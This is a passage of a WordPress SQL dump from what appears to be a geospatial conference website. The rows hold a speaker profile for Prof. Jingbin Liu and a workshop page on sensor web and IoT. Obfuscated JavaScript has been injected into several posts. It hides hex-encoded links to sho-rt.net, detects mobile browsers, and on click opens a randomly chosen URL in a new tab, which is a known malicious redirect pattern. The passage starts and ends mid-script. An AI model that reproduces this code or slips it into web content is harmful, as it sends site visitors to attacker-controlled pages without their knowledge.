_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles','','inherit','closed','closed','','2856-revision-v1','','','2023-03-03 17:25:40','2023-03-03 17:25:40','',2856,'https://gsw2023.com/?p=3927',0,'revision','',0),
(3928,1,'2023-03-04 09:21:33','2023-03-04 09:21:33','<!-- wp:paragraph -->\n<p> Wuhan University</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>',' Prof. Jingbin Liu, LIESMARS','','publish','closed','closed','','prof-jingbin-liu-liesmars','','','2023-03-04 09:21:36','2023-03-04 09:21:36','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3928',0,'dt_team','',0),
(3929,1,'2023-03-04 09:20:59','2023-03-04 09:20:59','','Jingbin Liu','','inherit','open','closed','','jingbin-liu','','','2023-03-04 09:20:59','2023-03-04 09:20:59','',3928,'https://gsw2023.com/wp-content/uploads/2023/03/Jingbin-Liu.jpg',0,'attachment','image/jpeg',0),
(3930,1,'2023-03-07 11:38:34','2023-03-07 11:38:34','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Intelligent Systems in Sensor Web and Internet of Things</strong></span></h5>\n<h5 class=\"fancy-subtitle start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Organized by ISPRS WG IV/7</strong></span></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" resized_image_dimensions=\"6x8\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong>Themes of Event</strong></h5>\n<ul>\n<li><strong>Fusion and integration of data from sensors, IoT devices, and crowd sources for supporting digital twins and smart cities.</strong></li>\n<li><strong>New methods and techniques (e.g., machine learning and deep learning based, decentralized processing, and edge computing) for analyzing, predicting, and simulating data from sensors, IoT devices, and crowd sources.</strong></li>\n<li><strong>Research on ethical use of and trust in data from ubiquitous sensors, IoT devices, crowdsourcing, and intelligent systems.</strong></li>\n<li><strong>Potential of sensor web, Internet of Things, crowdsourcing, participatory and intelligent systems for user-centered planning and decision support, situational awareness and emergency management.</strong></li>\n<li><strong>Efficient use of the data from sensors, IoT devices, crowdsourcing, and intelligent/participatory systems for supporting the implementation of UNs’ SDGs.</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Scientific Committee</strong></h5>\n<p>Dr. Maria Antonia Brovelli - Politecnico di Milano, Italy</p>\n<p>Dr. Cidália Costa Fonte - University of Coimbra, Portugal</p>\n<p>Dr. Chih-Yuan Huang - National Central University, Chinese Taibei</p>\n<p>Dr. Changfeng Jing - China University of Geosciences, China</p>\n<p>Dr. Marguerite Madden - University of Georgia, USA</p>\n<p>Dr. Marco Minghini - European Commission – Joint Research Centre, Italy</p>\n<p>Dr. Dev Raj Paudyal - University of Southern Queensland, Australia</p>\n<p>Dr. Mingshu Wang - University of Glasgow, UK</p>\n<p>Dr. Vasil Yordanov - Politecnico di Milano, Italy</p>\n<p>Dr. Ana-Maria Raimond - LASTIG laboratory, University Gustave Eiffel - IGN/ENSG, France</p>\n<p>Dr. Steve Liang - University of Calgary, Canada[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return 